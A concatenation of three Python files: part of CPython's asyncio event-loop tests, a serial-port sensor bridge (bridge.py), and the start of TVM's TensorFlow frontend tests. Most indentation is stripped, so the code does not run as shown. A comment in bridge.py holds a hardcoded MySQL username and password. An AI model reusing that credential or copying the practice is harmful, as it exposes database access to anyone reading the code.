handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
@asyncio.coroutine
def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
protocol = MyDatagramProto(create_future=True, loop=self.loop)
self.loop.sock_connect = sock_connect = mock.Mock()
sock_connect.return_value = []
coro = self.loop.create_datagram_endpoint(
lambda: protocol,
remote_addr=('127.0.0.1', 0),
allow_broadcast=True)
transport, _ = self.loop.run_until_complete(coro)
self.assertFalse(sock_connect.called)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuseport_supported:
try:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
except OSError:
# Python's socket module was compiled using modern headers
# thus defining SO_REUSEPORT but this process is running
# under an older kernel that does not support SO_REUSEPORT.
reuseport_supported = False
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_reuse_address_error(self):
# bpo-37228: Ensure that explicit passing of `reuse_address=True`
# raises an error, as it is not safe to use SO_REUSEADDR when using UDP
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(coro)
def test_create_datagram_endpoint_reuse_address_warning(self):
# bpo-37228: Deprecate *reuse_address* parameter
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False)
with self.assertWarns(DeprecationWarning):
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
@asyncio.coroutine
def stop_loop_coro(loop):
yield from ()
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
@asyncio.coroutine
def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, support.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(support.TESTFN, 'r') as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
def check_set_nodelay(self, sock):
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertFalse(opt)
base_events._set_nodelay(sock)
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertTrue(opt)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'need socket.TCP_NODELAY')
def test_set_nodelay(self):
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
self.check_set_nodelay(sock)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
sock.setblocking(False)
self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
|
bridge.py
|
#!/usr/bin/env python
import sys
import time
import serial
import queue
import threading
import re
from sqlalchemy import *
from sqlalchemy.orm import *
from ..database import db
class Bridge():
def __init__(self, from_hw_queue, device_id, sensors):
# self.device = device
self.sensors = sensors
self.device_id = device_id
self.from_hw = from_hw_queue
self.to_hw = queue.Queue()
self.running = True
self.serialport = '/dev/ttyUSB0'
self.serialrate = 9600
self.myserial = None
self.stopped = True
self.test = False
self.output = True
# self.engine = create_engine('mysql+pymysql://thehub:cas0iWur@localhost:3306/hubdb_test')
# self.session = sessionmaker(bind=self.engine)()
# session_factory = db.sessionmaker(bind=db.engine)
# Session = db.scoped_session(session_factory)
# self.session = Session()
# self.session = db.session
if self.test:
self.fromhwtest = queue.Queue()
if self.output:
self.f = open('bridge_file.txt', 'a')
self.start()
#stop, send the kill message to the thread
def stop(self):
self.to_hw.put_nowait("kill")
def start(self):
if self.output:
self.f.write("starting\n")
#check that required information is set
        if (self.from_hw is not None) and (self.serialport is not None) and (self.serialrate is not None) and self.stopped:
if (self.test):#testing
mythread = threading.Thread(target=self.theprocess)
if self.output:
self.f.write("starting process\n")
mythread.start()
else:
#setup serial and start thread
self.myserial = serial.Serial(self.serialport, self.serialrate, timeout=1)
if (self.myserial.isOpen()):
if self.output:
self.f.write("serial is open\n")
mythread = threading.Thread(target=self.theprocess)
mythread.start()
else:
#kick and scream
            if self.from_hw is None:
                print("from Hardware queue not yet set")
            if self.serialport is None:
                print("Serial Port not set")
            if self.serialrate is None:
                print("Serial Rate not set")
            if not self.stopped:
                print("Already running")
def theprocess(self):
self.stopped = False
self.running = True
while self.running:
#message for hardware
if (not(self.to_hw.empty())):
msg = str(self.to_hw.get_nowait())
if self.output:
self.f.write(" [*] Writing message to hardware: " + msg + "\n")
if (msg == 'kill'):
self.running = False
if self.output:
self.f.write(" Got a kill command\n")
else:
if (not(self.test)):
self.myserial.write(bytes(msg, 'UTF-8'))
if self.output:
self.f.write(" [*] Wrote message to hardware: " + msg + "\n")
if (not(self.test)):#not a test
hw_msg = self.myserial.readline().decode('utf8')
                # if (hw_msg != b''):  # got a message from the hardware
                if (hw_msg != ""):  # got a message from the hardware
if self.output:
self.f.write(" [x] Got message from hardware: " + hw_msg + "\n")
print(" [x] Got message from hardware: " + hw_msg + "\n")
self.from_hw.put_nowait(self.translate_message_fromhw(hw_msg))
else:#is a test
if (not( self.fromhwtest.empty())):
hw_msg = self.fromhwtest.get()
if self.output:
print (" [x] Got test message from hardware: " + hw_msg)
self.from_hw.put_nowait(self.translate_message_fromhw(hw_msg))
if (not(self.test)):#not a test, clean up
self.myserial.close()
self.stopped = True
def send_message(self, themessage):
#translated_message = translate_message_tohw(themessage)
        print("message to hardware")
if self.output:
print (" [x] Got message to pass to hardware: " + themessage)
if themessage == "kill":
self.to_hw.put_nowait("kill")
else:
            #default behavior: query all sensors
            for somesensor in self.sensors:
                #print(somesensor.pin)
                if re.match("[A-Z][A-Z0-9]", somesensor.pin):
                    self.to_hw.put_nowait(somesensor.pin)
                else:
                    print("Bad sensor ID: " + somesensor.pin)
    #placeholder for message translation
    def translate_message_tohw(self, themessage):
print ("message to hardware")
#do some translating eventually
outmessage = themessage
return outmessage
def translate_message_fromhw (self,themessage):
#do some translating
outmessage = ""
if themessage[0] == "V":
print("sensor: "+themessage[1:3])
#get appropriate sensor object
#db.session.commit()
#thesensors = db.session.query(db.Sensor).filter(db.Sensor.device_id==self.device.id).filter(db.Sensor.pin==themessage[1:4])
#db.session.commit()
#create dataeven object and return
# if self.session.query(db.Sensor).filter(db.Sensor.device_id==self.device.id).filter(db.Sensor.pin==themessage[1:4]).count()>0:
#db.session.commit()
# thesensor = self.session.query(db.Sensor).filter(db.Sensor.device_id==self.device.id).filter(db.Sensor.pin==themessage[1:4]).all()[0]
#db.session.commit()
# outmessage = db.DataEvent(device = self.device, sensor = thesensor, value =int(themessage[3:6]))
#db.session.commit()
# if self.output:
# print("created data event")
#for somesensor in self.sensors:
#print(somesensor.pin)
#if themessage[1:4] == somesensor.pin:
# outmessage = themessage[0]+str(somesensor.id).zfill(3) +themessage[4:]
outmessage = themessage[0]+str(self.device_id).zfill(3)+themessage[1:]
print("sent to loop" + outmessage)
return outmessage
def __del__(self):
#if self.output:
# self.f.close()
pass
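# --- Usage sketch (illustrative; not part of the original module) ---
# A minimal, hypothetical wiring of the bridge. The sensor list, pin "A1",
# device_id 7 and the hardware line "VA1042" below are assumptions for
# illustration only; the serial port and baud rate are hard-coded in __init__.
#
#   from_hw = queue.Queue()
#   bridge = Bridge(from_hw, device_id=7, sensors=my_sensors)  # opens the port and starts the worker thread
#   bridge.send_message("get")    # any message other than "kill" queues every valid sensor pin for the hardware
#   bridge.send_message("kill")   # asks the worker thread to stop and close the port
#
# Framing done by translate_message_fromhw: a hardware line such as "VA1042"
# keeps its leading "V" and gains the zero-padded device id, so with
# device_id=7 it is forwarded to the from_hw queue as "V007A1042".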
|
test_forward.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
Tensorflow testcases
====================
This module is a test script for testing TensorFlow operators with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from tvm.relay.frontend.tensorflow import from_tensorflow
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
if not isinstance(x, list):
x = [x]
return x
tf_dtypes = {
"float32": tf.float32,
"float16": tf.float16,
"float64": tf.float64,
"int32": tf.int32,
"uint8": tf.uint8,
"int8": tf.int8,
"int16": tf.int16,
"uint16": tf.uint16,
"int64": tf.int64,
}
def vmobj_to_list(o):
if isinstance(o, tvm.nd.NDArray):
return [o.asnumpy()]
elif isinstance(o, tvm.runtime.container.ADT):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
elif isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
if o.constructor.name_hint == "Cons":
tl = vmobj_to_list(o.fields[1])
hd = vmobj_to_list(o.fields[0])
hd.extend(tl)
return hd
elif o.constructor.name_hint == "Nil":
return []
elif "tensor_nil" in o.constructor.name_hint:
return [0]
elif "tensor" in o.constructor.name_hint:
return [o.fields[0].asnumpy()]
else:
raise RuntimeError("Unknown object type: %s" % o.constructor.name_hint)
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
graph_def,
input_data,
input_node,
num_output=1,
target="llvm",
out_names=None,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
layout=None,
disabled_pass=None,
ignore_in_shape=False,
serialize=False,
):
""" Generic function to compile on relay and execute on tvm """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
if target == "cuda":
layout = cuda_layout
target_host = None
if ignore_in_shape:
shape_dict = None
else:
shape_dict = {
e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
}
mod, params = relay.frontend.from_tensorflow(
graph_def, layout=layout, shape=shape_dict, outputs=out_names
)
dev = tvm.device(target, 0)
if mode == "debug":
ex = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm")
inputs = []
for param in mod["main"].params:
found = False
for i, n in enumerate(input_node):
if n == param.name_hint:
found = True
inputs.append(tvm.nd.array(input_data[i]))
break
# Interpreter doesn't bind constants, so still need to find in params
if not found:
inputs.append(tvm.nd.array(params[param.name_hint]))
result = ex.evaluate()(*inputs)
return vmobj_to_list(result)
elif mode == "vm":
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
print(mod["main"])
mod = relay.transform.InferType()(mod)
vm_exec = relay.vm.compile(mod, target="llvm", params=params)
if serialize:
code, lib = vm_exec.save()
vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
vm = VirtualMachine(vm_exec, tvm.cpu())
inputs = {}
for e, i in zip(input_node, input_data):
inputs[e] = tvm.nd.array(i)
result = vm.invoke("main", **inputs)
